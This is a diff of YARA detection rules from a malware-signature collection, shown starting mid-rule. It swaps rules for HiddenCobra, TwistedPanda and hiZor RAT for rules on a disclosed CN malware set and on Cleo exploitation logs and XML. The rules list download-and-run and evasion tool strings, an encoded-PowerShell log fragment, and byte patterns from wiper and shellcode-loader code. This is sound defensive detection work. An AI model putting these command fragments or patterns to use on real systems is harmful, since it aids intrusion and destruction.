 		quality = 85
 		tags = "FILE"
-		hash1 = "70034b33f59c6698403293cdc28676c7daa8c49031089efa6eefce41e22dccb3"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e"
 
 	strings:
-		$s1 = "%SystemRoot%\\System32\\svchost.exe -k mdnetuse" fullword ascii
-		$s2 = "%s\\hid.dll" fullword ascii
-		$s3 = "%Systemroot%\\System32\\" ascii
-		$s4 = "SYSTEM\\CurrentControlSet\\services\\%s\\Parameters" fullword ascii
+		$x1 = "%SystemRoot%\\system32\\termsrvhack.dll" fullword ascii
+		$x2 = "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
+		$a1 = "taskkill /f /im cmd.exe" fullword ascii
+		$a2 = "taskkill /f /im mstsc.exe" fullword ascii
+		$a3 = "taskkill /f /im taskmgr.exe" fullword ascii
+		$a4 = "taskkill /f /im regedit.exe" fullword ascii
+		$a5 = "taskkill /f /im mmc.exe" fullword ascii
+		$s1 = "K7TSecurity.exe" fullword ascii
+		$s2 = "ServUDaemon.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( pe.imphash ( ) == "28e3a58132364197d7cb29ee104004bf" or 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_APT_MAL_HOPLIGHT_NK_Hiddencobra_Apr19_3 : FILE
+rule SIGNATURE_BASE_CN_Disclosed_20180208_Keylogger_1 : FILE
 {
 	meta:
-		description = "Detects HOPLIGHT malware used by HiddenCobra APT group"
+		description = "Detects malware from disclosed CN malware set"
 		author = "Florian Roth (Nextron Systems)"
-		id = "683b4d64-575a-5bdb-9ad8-e10a60037032"
-		date = "2019-04-13"
+		id = "12eff9b6-1a65-5efc-b39c-88297bdae9c3"
+		date = "2018-02-08"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hidden_cobra.yar#L156-L185"
+		reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_campaign_njrat.yar#L105-L122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5cbdf0c4c5025bc1d95d27a32fa69efb329e8f74243646a31458fea225d21875"
+		logic_hash = "efba7004614c690e469082255cf7b5cb62cac5da2bfcc26e036e2eafcb5728f9"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525"
-		hash2 = "05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461"
-		hash3 = "ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf"
 
 	strings:
-		$s1 = "Oleaut32.dll" fullword ascii
-		$s2 = "Process32NextA" fullword ascii
-		$s3 = "Process32FirstA" fullword ascii
-		$s4 = "%sRSA key size  : %d bits" fullword ascii
-		$s5 = "emailAddress=" fullword ascii
-		$s6 = "%scert. version : %d" fullword ascii
-		$s7 = "www.naver.com" fullword ascii
-		$x1 = "ztretrtireotreotieroptkierert" fullword ascii
-		$x2 = "reykfgkodfgkfdskgdfogpdokgsdfpg" fullword ascii
-		$x3 = "fjiejffndxklfsdkfjsaadiepwn" fullword ascii
-		$x4 = "fgwljusjpdjah" fullword ascii
-		$x5 = "udbcgiut.dat" fullword ascii
+		$x2 = "Process already elevated." fullword wide
+		$x3 = "GetKeyloggErLogsResponse" fullword ascii
+		$x4 = "get_encryptedPassword" fullword ascii
+		$x5 = "DoDownloadAndExecute" fullword ascii
+		$x6 = "GetKeyloggeRLogs" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( 1 of ( $x* ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
 }
-rule SIGNATURE_BASE_APT_CN_Twistedpanda_Loader : FILE
+
+rule SIGNATURE_BASE_CN_Disclosed_20180208_Mal4 : FILE
 {
 	meta:
-		description = "Detects loader used by TwistedPanda"
-		author = "Check Point Research"
-		id = "a10f6019-f069-579c-b112-18537a7d8fd8"
-		date = "2022-04-14"
-		modified = "2025-07-01"
-		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_twisted_panda.yar#L1-L44"
+		description = "Detects malware from disclosed CN malware set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6165caf5-157f-5381-a77e-6ed775187ab1"
+		date = "2018-02-08"
+		modified = "2023-12-05"
+		reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_campaign_njrat.yar#L124-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b7f4f31a26b5f968b1d5c82d9165b4d45d75336993b113dda54fd37f628639ee"
-		score = 80
+		logic_hash = "044901271adb06036e7d5aa8f2b6f893be10445bee95453c293d0025994e8d21"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "5b558c5fcbed8544cb100bd3db3c04a70dca02eec6fedffd5e3dcecb0b04fba0"
-		hash2 = "efa754450f199caae204ca387976e197d95cdc7e83641444c1a5a91b58ba6198"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f7549c74f09be7e4dbfb64006e535b9f6d17352e236edc2cdb102ec3035cf66e"
 
 	strings:
-		$seq1 = { 6A 40 68 00 30 00 00 }
-		$seq2 = { 6A 00 50 6A 14 8D ?? ?? ?? ?? ?? 50 53 FF }
-		$seq3 = { 6A 00 6A 00 6A 03 6A 00 6A 03 68 00 00 00 80 }
-		$decryption = { 8B C? [2-3] F6 D? 1A C? [4-6] 30 0? ?? 4? }
+		$s1 = "Microsoft .Net Framework COM+ Support" fullword ascii
+		$s2 = "Microsoft .NET and Windows XP COM+ Integration with SOAP" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and all of ( $seq* ) and $decryption
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them and pe.exports ( "SPACE" )
 }
-rule SIGNATURE_BASE_APT_CN_Twistedpanda_SPINNER_1 : FILE
+rule SIGNATURE_BASE_CN_Disclosed_20180208_Mal5 : FILE
 {
 	meta:
-		description = "Detects the obfuscated variant of SPINNER payload used by TwistedPanda"
-		author = "Check Point Research"
-		id = "0b44013d-0caa-5ea2-ab08-e2a6a5732c03"
-		date = "2022-04-14"
-		modified = "2025-07-01"
-		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_twisted_panda.yar#L46-L80"
+		description = "Detects malware from disclosed CN malware set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b1933610-9e6d-5eed-ba30-ccdd0d3a6124"
+		date = "2018-02-08"
+		modified = "2023-12-05"
+		reference = "https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_campaign_njrat.yar#L140-L160"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e7abe4b3f4225596131882a9175f9ac2e45ba00557950772a8e4d1eaeab97d05"
-		score = 80
+		logic_hash = "971276d5033477a08a1ec037cff9735667c2b4f7d9d4a7bcd88f2b1d8c348d4f"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "a9fb7bb40de8508606a318866e0e5ff79b98f314e782f26c7044622939dfde81"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "24c05cd8a1175fbd9aca315ec67fb621448d96bd186e8d5e98cb4f3a19482af4"
+		hash2 = "05696db46144dab3355dcefe0408f906a6d43fced04cb68334df31c6dfd12720"
 
 	strings:
-		$config_init = { C7 ?? ?? ?? 00 00 00 C7 ?? ?? ?? 00 00 00 C6 }
-		$c2_cmd_1 = { 01 00 03 10}
-		$c2_cmd_2 = { 02 00 01 10}
-		$c2_cmd_3 = { 01 00 01 10}
-		$decryption = { 8D 83 [4] 80 B3 [5] 89 F1 6A 01 50 E8 [4] 80 B3 }
+		$s1 = "4System.Web.Services.Protocols.SoapHttpClientProtocol" fullword ascii
+		$s2 = "Server.exe" fullword ascii
+		$s3 = "System.Windows.Forms.Form" fullword ascii
+		$s4 = "Stub.Resources.resources" fullword ascii
+		$s5 = "My.Computer" fullword ascii
+		$s6 = "MyTemplate" fullword ascii
+		$s7 = "Stub.My.Resources" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and #config_init > 10 and 2 of ( $c2_cmd_* ) and $decryption
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_APT_CN_Twistedpanda_SPINNER_2 : FILE
+rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_Log_Indicators_Dec24 : SCRIPT
 {
 	meta:
-		description = "Detects an older variant of SPINNER payload used by TwistedPanda"
-		author = "Check Point Research"
-		id = "bbbf3af1-127f-5d32-967f-bdb94311d1d6"
-		date = "2022-04-14"
-		modified = "2025-07-01"
-		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_twisted_panda.yar#L82-L118"
+		description = "Detects indicators found in logs during and after Cleo software exploitation (as reported by Huntress in December 2024)"
+		author = "Florian Roth"
+		id = "385042a9-fc8c-5b50-975f-3436a16e6861"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d1e34903e58fb76671a076acbb9f26e10d511c8f00be90b4901d61b73b90a9a7"
-		score = 80
+		logic_hash = "a7e6713a08d7cce00cffba8daa12b251ccc12dc8d5a5f38d568bd5054e3783a2"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "28ecd1127bac08759d018787484b1bd16213809a2cc414514dc1ea87eb4c5ab8"
+		tags = "SCRIPT"
 
 	strings:
-		$config_init = { C7 [3] 00 00 00 C7 [3] 00 00 00 C6 }
-		$c2_cmd_1 = { 01 00 03 10 }
-		$c2_cmd_2 = { 02 00 01 10 }
-		$c2_cmd_3 = { 01 00 01 10 }
-		$c2_cmd_4 = { 01 00 00 10 }
-		$c2_cmd_5 = { 02 00 00 10 }
-		$decryption = { 80 B3 [5] 8D BB [4] 8B 56 14 8B C2 8B 4E 10 2B C1 83 F8 01 }
+		$x1 = "Note: Processing autorun file 'autorun\\health" ascii wide
+		$x2 = "60282967-dc91-40ef-a34c-38e992509c2c.xml" ascii wide
+		$x3 = "<Detail level=\"1\">Executing 'cmd.exe /c \"powershell -NonInteractive -EncodedCommand " ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and #config_init > 10 and 2 of ( $c2_cmd_* ) and $decryption
+		1 of them
 }
-rule SIGNATURE_BASE_APT_CN_Twistedpanda_64Bit_Loader : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_Cleo_Exploitation_Log_Indicators_Dec24_1 : FILE
 {
 	meta:
-		description = "Detects the 64bit Loader DLL used by TwistedPanda"
-		author = "Check Point Research"
-		id = "2172dd33-204b-5a05-ad26-534a0c1d7a17"
-		date = "2022-04-14"
-		modified = "2025-07-01"
-		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_twisted_panda.yar#L120-L155"
+		description = "Detects indicators found in logs during and after Cleo software exploitation (as reported by Huntress in December 2024)"
+		author = "X__Junior"
+		id = "81daf184-4c38-5d84-899b-9d0de2f39934"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L18-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "644547f9fa6ca3f34ea32e06896f341e0c92f5c57dee3c478aed0cdf87b2f3de"
-		score = 80
-		quality = 85
+		logic_hash = "481ddd570d0292036b421223ce0f839ece86cc1a97aa226a8b9fbd1d63905d1b"
+		score = 75
+		quality = 83
 		tags = "FILE"
-		hash1 = "e0d4ef7190ff50e6ad2a2403c87cc37254498e8cc5a3b2b8798983b1b3cdc94f"
+		hash1 = "786951478a0fc5db24f6e1d8dcc5eaa8880dbd928da97828a61f1f1f0f21e21d"
 
 	strings:
-		$path_check = { 48 8D [6] 48 8B ?? 48 81 [5] 72 }
-		$shellcode_read = { 48 8B D0 41 B8 F0 16 00 00 48 8B CF 48 8B D8 FF}
-		$shellcode_allocate = { BA F0 16 00 00 44 8D 4E 40 33 C9 41 B8 00 30 00 00 FF }
+		$sa1 = "<Thread type=\"AutoRun\" action=" ascii
+		$sa2 = "<Mark date=" ascii
+		$sa3 = "<Event>" ascii
+		$sa4 = "<Command text" ascii
+		$sb1 = "[System.Net.WebRequest]::create" ascii
+		$sb2 = "Invoke-RestMethod" ascii
+		$sb3 = "Invoke-WebRequest" ascii
+		$sb4 = "iwr " ascii
+		$sb5 = "Net.WebClient" ascii
+		$sb6 = "Resume-BitsTransfer" ascii
+		$sb7 = "Start-BitsTransfer" ascii
+		$sb8 = "wget " ascii
+		$sb9 = "WinHttp.WinHttpRequest" ascii
+		$sb10 = ".DownloadFile(" ascii
+		$sb11 = ".DownloadString(" ascii
+		$sb12 = "Bypass" nocase ascii
+		$sb13 = "-EncodedCommand" ascii
+		$sb14 = "-windowstyle hidden" ascii
+		$sb15 = " -enc " ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and $path_check and $shellcode_allocate and $shellcode_read
+		filesize < 1MB and all of ( $sa* ) and 1 of ( $sb* )
 }
-rule SIGNATURE_BASE_APT_CN_Twistedpanda_Droppers : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_Cleo_Exploitation_Log_Indicators_Dec24_2 : FILE
 {
 	meta:
-		description = "Detects droppers used by TwistedPanda"
-		author = "Check Point Research"
-		id = "f61c8b97-5870-5837-942f-f1650870960a"
-		date = "2022-04-14"
-		modified = "2025-07-01"
-		reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_twisted_panda.yar#L157-L194"
+		description = "Detects indicators found in logs during and after Cleo software exploitation (as reported by Huntress in December 2024)"
+		author = "X__Junior"
+		id = "d215d4a0-1726-58d4-90df-8ec6102effe1"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L54-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "820b4796511dcf98cdc8017a39cc2c65e44d8d9a20f55803aa1ddd36f649c83a"
-		score = 80
+		logic_hash = "8debaf2c85ea63501b7a3c2ff8af7a8484f4d6097e073645d808cbd50ef1511a"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "59dea38da6e515af45d6df68f8959601e2bbf0302e35b7989e741e9aba2f0291"
-		hash2 = "8b04479fdf22892cdfebd6e6fbed180701e036806ed0ddbe79f0b29f73449248"
-		hash3 = "f29a0cda6e56fc0e26efa3b6628c6bcaa0819a3275a10e9da2a8517778152d66"
 
 	strings:
-		$switch_control = { 81 FA [4] 75 ?? E8 [4] 48 89 05 [4] E? }
-		$byte_manipulation = { 41 0F [2] 44 [2] 41 [2] 03 41 81 [5] 41 }
-		$stack_strings_1 = { 25 00 70 00 }
-		$stack_strings_2 = { 75 00 62 00 }
-		$stack_strings_3 = { 6C 00 69 00 }
-		$stack_strings_4 = { 63 00 25 00 }
+		$sa1 = "<Thread type=\"AutoRun\" action=" ascii
+		$sa2 = "<Mark date=" ascii
+		$sa3 = "<Event>" ascii
+		$sa4 = "<Command text" ascii
+		$sb1 = "wscript" ascii
+		$sb2 = "cscript" ascii
+		$sb3 = "mshta" ascii
+		$sb4 = "certutil" ascii
+		$sb5 = "pwsh" ascii
+		$sb6 = "curl" ascii
+		$sb7 = "msiexec" ascii
+		$sb8 = "taskkill" ascii
+		$sb9 = "regsvr32" ascii
+		$sb10 = "rundll32" ascii
+		$sb11 = "bitsadmin" ascii
+		$sb12 = "whoami" ascii
+		$sb13 = "bcdedit" ascii
+		$sb14 = "systeminfo" ascii
+		$sb15 = "reg " ascii
+		$sb16 = "schtasks" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 3000KB and #switch_control > 8 and all of ( $stack_strings_* ) and $byte_manipulation
+		filesize < 1MB and all of ( $sa* ) and 1 of ( $sb* )
 }
-rule SIGNATURE_BASE_SUSP_ELF_LNX_UPX_Compressed_File : FILE
+rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_XML_Indicators_Dec24 : FILE
 {
 	meta:
-		description = "Detects a suspicious ELF binary with UPX compression"
-		author = "Florian Roth (Nextron Systems)"
-		id = "078937de-59b3-538e-a5c3-57f4e6050212"
-		date = "2018-12-12"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_elf_file_anomalies.yar#L2-L21"
+		description = "Detects XML used during and after Cleo software exploitation (as reported by Huntress in December 2024)"
+		author = "Florian Roth"
+		id = "622633af-aa7a-5bf9-a59c-6590535d86a4"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L91-L109"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0d310de1ab68bd6da9ae057c7edea0d6b24d408f85ec40c2306f1ac8a2bc2f55"
-		score = 40
+		logic_hash = "21c11c3e0c0ffea89e24b9c002b6112a46b4dc7c2c4f1f5dc9803758a68efc36"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4"
 
 	strings:
-		$s1 = "PROT_EXEC|PROT_WRITE failed." fullword ascii
-		$s2 = "$Id: UPX" fullword ascii
-		$s3 = "$Info: This file is packed with the UPX executable packer" ascii
-		$fp1 = "check your UCL installation !"
+		$x1 = "<Host alias=\"60282967-dc91-40ef-a34c-38e992509c2c\" application=\"\" " ascii
+		$s1 = "<Commands>SYSTEM cmd.exe /c " ascii
+		$a1 = "<Action actiontype=\"Commands\" " ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 2000KB and filesize > 30KB and 2 of ( $s* ) and not 1 of ( $fp* )
+		filesize < 50KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_Hiddencobra_R4_Wiper_1 : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_Cleo_Exploitation_XML_Indicators_Dec24_1 : FILE
 {
 	meta:
-		description = "Detects HiddenCobra Wiper"
-		author = "NCCIC Partner"
-		id = "4978c190-7b66-5cea-96df-809f85620986"
-		date = "2017-12-12"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hiddencobra_wiper.yar#L8-L20"
+		description = "Detects XML used during and after Cleo software exploitation (as reported by Huntress in December 2024)"
+		author = "X__Junior"
+		id = "b30ca09f-b84c-5de8-9bf7-9f3269f32c1f"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L112-L146"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0e88b7f8491e87cce0deb5f246ca521bdb556b9c79c697559bdf8b0b332e714e"
-		score = 75
-		quality = 85
+		logic_hash = "c9be15aec57fdde62815ee04daa5616940ab7949784d382a4825dce9f1e28568"
+		score = 70
+		quality = 83
 		tags = "FILE"
+		hash1 = "b103f708e85416fc6d7af9605da4b57b3abe42fb9c6c9ec0f539b4c877580bd2"
 
 	strings:
-		$mbr_code = { 33 C0 8E D0 BC 00 7C FB 50 07 50 1F FC BE 5D 7C 33 C9 41 81 F9 00 ?? 74 24 B4 43 B0 00 CD 13 FE C2 80 FA 84 7C F3 B2 80 BF 65 7C 81 05 00 04 83 55 02 00 83 55 04 00 83 55 06 00 EB D5 BE 4D 7C B4 43 B0 00 CD 13 33 C9 BE 5D 7C EB C5 }
-		$controlServiceFoundlnBoth = { 83 EC 1C 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 44 8B 44 24 24 53 56 6A 24 50 57 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 85 F6 74 1C 8D 4C 24 0C 51 6A 01 56 FF 15 ?? ?? ?? ?? 68 E8 03 00 00 FF 15 ?? ?? ?? ?? 56 FF D3 57 FF D3 5E 5B 33 C0 5F 83 C4 1C C3 33 C0 5F 83 C4 1C C3 }
+		$sa1 = "<Action actiontype=\"Commands\"" ascii
+		$sa2 = "<?xml version=" ascii
+		$sa3 = "<Runninglocalrequired>" ascii
+		$sa4 = "<Autostartup>" ascii
+		$sb1 = "[System.Net.WebRequest]::create" ascii
+		$sb2 = "Invoke-RestMethod" ascii
+		$sb3 = "Invoke-WebRequest" ascii
+		$sb4 = "iwr " ascii
+		$sb5 = "Net.WebClient" ascii
+		$sb6 = "Resume-BitsTransfer" ascii
+		$sb7 = "Start-BitsTransfer" ascii
+		$sb8 = "wget " ascii
+		$sb9 = "WinHttp.WinHttpRequest" ascii
+		$sb10 = ".DownloadFile(" ascii
+		$sb11 = ".DownloadString(" ascii
+		$sb12 = "Bypass" nocase ascii
+		$sb13 = "-EncodedCommand" ascii
+		$sb14 = "-windowstyle hidden" ascii
+		$sb15 = " -enc " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint16( uint32( 0x3c ) ) == 0x4550 and any of them
+		filesize < 10KB and all of ( $sa* ) and 1 of ( $sb* )
 }
-rule SIGNATURE_BASE_Hiddencobra_R4_Wiper_2 : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_Cleo_Exploitation_XML_Indicators_Dec24_2 : FILE
 {
 	meta:
-		description = "Detects HiddenCobra Wiper"
-		author = "NCCIC Partner"
-		id = "75acc3cb-90dd-58e8-b094-ed3f28650b1b"
-		date = "2017-12-12"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hiddencobra_wiper.yar#L22-L35"
+		description = "Detects XML used during and after Cleo software exploitation (as reported by Huntress in December 2024)"
+		author = "X__Junior"
+		id = "a71c71f3-d36f-5c27-b150-e678bccf2dba"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L148-L183"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f537f67be28f854db0d56199d2a43f90cf6c80469a6f9853db0cd550440c7e1f"
-		score = 75
+		logic_hash = "60e53c8d99fde8c48bff67408605aa69c3c1fe3040ba4f9d2080980df970aa93"
+		score = 70
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$PhysicalDriveSTR = "\\\\.\\PhysicalDrive" wide
-		$ExtendedWrite = { B4 43 B0 00 CD 13 }
+		$sa1 = "<Action actiontype=\"Commands\"" ascii
+		$sa2 = "<?xml version=" ascii
+		$sa3 = "<Runninglocalrequired>" ascii
+		$sa4 = "<Autostartup>" ascii
+		$sb1 = "wscript" ascii
+		$sb2 = "cscript" ascii
+		$sb3 = "mshta" ascii
+		$sb4 = "certutil" ascii
+		$sb5 = "pwsh" ascii
+		$sb6 = "curl" ascii
+		$sb7 = "msiexec" ascii
+		$sb8 = "taskkill" ascii
+		$sb9 = "regsvr32" ascii
+		$sb10 = "rundll32" ascii
+		$sb11 = "bitsadmin" ascii
+		$sb12 = "whoami" ascii
+		$sb13 = "bcdedit" ascii
+		$sb14 = "systeminfo" ascii
+		$sb15 = "reg " ascii
+		$sb16 = "schtasks" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint16( uint32( 0x3c ) ) == 0x4550 and all of them
+		filesize < 10KB and all of ( $sa* ) and 1 of ( $sb* )
 }
-rule SIGNATURE_BASE_Apt_Win32_Dll_Rat_Hizorrat : FILE
+rule SIGNATURE_BASE_EXPL_Cleo_Exploitation_PS1_Indicators_Dec24 : SCRIPT
 {
 	meta:
-		description = "Detects hiZor RAT"
+		description = "Detects encoded and decoded PowerShell loader used during Cleo software exploitation (as reported by Huntress in December 2024)"
 		author = "Florian Roth"
-		id = "06fd02f2-2630-5aac-8011-67d67ff42c3f"
-		date = "2016-02-15"
-		modified = "2023-12-05"
-		reference = "https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hizor_rat.yar#L1-L28"
+		id = "491cda57-0ad0-5ddc-90cb-48411eef2f2e"
+		date = "2024-12-10"
+		modified = "2024-12-12"
+		reference = "https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cleo_dec24.yar#L185-L202"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4e3224d34db788d2cba9da74690bf75429d6e8a516d7666d0331e465d08640cb"
+		logic_hash = "87dcd0aa3c16d8948514b1d8589d38c6cc73bf7e6262f4517659cead16fedd3d"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf"
-		hash2 = "d9821468315ccd3b9ea03161566ef18e"
-		hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a"
+		tags = "SCRIPT"
 
 	strings:
-		$s1 = { c7 [5] 40 00 62 00 c7 [5] 77 00 64 00 c7 [5] 61 00 61 00 c7 [5] 6c 00 }
-		$s2 = { 66 [7] 0d 40 83 ?? ?? 7c ?? }
-		$s3 = { 80 [2] 2e 40 3b ?? 72 ?? }
-		$s4 = "CmdProcessExited" wide ascii
-		$s5 = "rootDir" wide ascii
-		$s6 = "DllRegisterServer" wide ascii
